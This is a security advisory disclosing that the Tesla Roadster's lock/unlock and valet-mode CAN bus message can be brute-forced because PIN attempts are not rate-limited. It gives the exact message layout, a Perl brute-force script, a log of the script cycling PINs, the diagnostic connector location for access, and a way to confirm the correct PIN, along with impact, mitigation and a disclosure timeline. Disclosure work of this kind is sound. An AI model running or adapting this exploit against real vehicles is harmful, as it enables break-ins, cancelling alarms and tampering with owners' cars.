SUMMARY
The Tesla Roadster instrumentation CAN bus (running at 1MHz) supports a CAN bus message to lock/unlock the car as well as enable/disable valet mode. Authentication on this message is via simple user PIN code which is typically 4 digits (but can be up to 8 digits).
It appears that this is vulnerable to brute-force attack as there is no rate limiting on reception/interpretation of that message.
TECHNICAL DETAILS
The CAN bus message is:
ID: 0x102 B1: 0x0B B2: 0x00 = Activate Valet mode 0x01 = Deactivate Valet mode 0x02 = Lock car 0x03 = unlock car B3: 0x00 B4: 0x00 B5: PIN LSB B6: PIN B7: PIN (total 28 bits for PIN) B8: PIN MSB 4 bits = number of PIN characters (1-8) 4 LSB bits = PIN MSB
Note: Example PIN 1234 unlock is 0x0B, 0x03, 0x00, 0x00, 0xD2, 0X04, 0x00, 0x40
Note: Unlock/lock does not affect the immobilizer+alarm (fitted on vehicles outside North America)
An example script using a laptop and USB to CAN bus adaptor.
sub teslacrack { my ($fn, $pin) = @_; my $msg = sprintf 't10280b%02x0000%02x%02x%02x%02x', $fn, $pin & 0xff, ($pin>>8) & 0xff, ($pin>>16) & 0xff, (length($pin)>24) & 0x0f); print $canusb $msg,"\r"; } for (0 .. 9999) { &teslacrack(3,$pin++); }
Transmitting at 100 messages / second, I tested PINs 0000 through 9999 in 100 seconds. Average PIN discovery time was thus approximately 50 seconds at this rate.
1493791128.000 CXX TESLACRACK FN#3 PIN5142 => t10280b03000016140040 1493791128.000 CXX TESLACRACK FN#3 PIN5143 => t10280b03000017140040 1493791128.000 CXX TESLACRACK FN#3 PIN5144 => t10280b03000018140040 1493791128.000 CXX TESLACRACK FN#3 PIN5145 => t10280b03000019140040 1493791128.000 CXX TESLACRACK FN#3 PIN5146 => t10280b0300001a140040 1493791128.000 CXX TESLACRACK FN#3 PIN5147 => t10280b0300001b140040 1493791128.000 CXX TESLACRACK FN#3 PIN5148 => t10280b0300001c140040 1493791128.000 CXX TESLACRACK FN#3 PIN5149 => t10280b0300001d140040 1493791128.000 CXX TESLACRACK FN#3 PIN5150 => t10280b0300001e140040 1493791128.000 CXX TESLACRACK FN#3 PIN5151 => t10280b0300001f140040 1493791128.000 CXX TESLACRACK FN#3 PIN5152 => t10280b03000020140040 1493791128.000 CXX TESLACRACK FN#3 PIN5153 => t10280b03000021140040 1493791128.000 CXX TESLACRACK FN#3 PIN5154 => t10280b03000022140040 1493791128.000 CXX TESLACRACK FN#3 PIN5155 => t10280b03000023140040 1493791128.000 CXX TESLACRACK FN#3 PIN5156 => t10280b03000024140040 1493791128.000 CXX TESLACRACK FN#3 PIN5157 => t10280b03000025140040 1493791128.000 CXX TESLACRACK FN#3 PIN5158 => t10280b03000026140040 1493791128.000 CXX TESLACRACK FN#3 PIN5159 => t10280b03000027140040 1493791128.000 CXX TESLACRACK FN#3 PIN5160 => t10280b03000028140040 1493791128.000 CXX TESLACRACK FN#3 PIN5161 => t10280b03000029140040 1493791128.000 CXX TESLACRACK FN#3 PIN5162 => t10280b0300002a140040
The CAN-USB adaptor I used was limited to approximately 100 messages / second. A faster adaptor could seemingly brute force this with greater speed.
Although not used for this brute force test, a CAN bus message is sent from the VMS to indicate the lock status. This is ID 0x100 B1=0x96. This message can be used to programatically verify that the PIN code tested was correct.
IMPACT
The instrumentation CAN bus is available at various points in the car, with the simplest being the engineering diagnostic connector in the passenger footwell of the vehicle.
The PIN code permits the following functions:
- Enable valet mode
- Disable valet mode
- Lock the vehicle
- Unlock the vehicle
- Cancel the alarm (via unlocking the vehicle) in North American vehicles
- Change the PIN code
On vehicles outside North America, a separate alarm system and immobiliser is used. That system is not affected by this PIN code, so functions 4 through 5 will have limited impact on these vehicles.
There is a separate physical key used to start the vehicle, and unlock the steering wheel, that is not affected by this vulnerability.
Overall, it seems that the greatest concerns for this brute force attack would be:
- Cancelling a sounding alarm on North American vehicles
- Providing access to the trunk and glove compartment of a locked vehicle
- Malicious prank to enable valet mode
- Malicious prank to change the PIN code (possibly after enabling valet mode)
MITIGATION
While the default PIN code provided with the vehicle is 4 digits, the system does seems to accept longer PIN codes. Use of longer PIN codes would increase the time taken to successfully brute force the code.
Reported: 3 May 2017
Classification: Sensitive Data Exposure > Critically Sensitive Data > Password Disclosure
Vendor Response: Declined to address, and no fix for more than 1 year, so public release
Public Release: 3 Dec 2018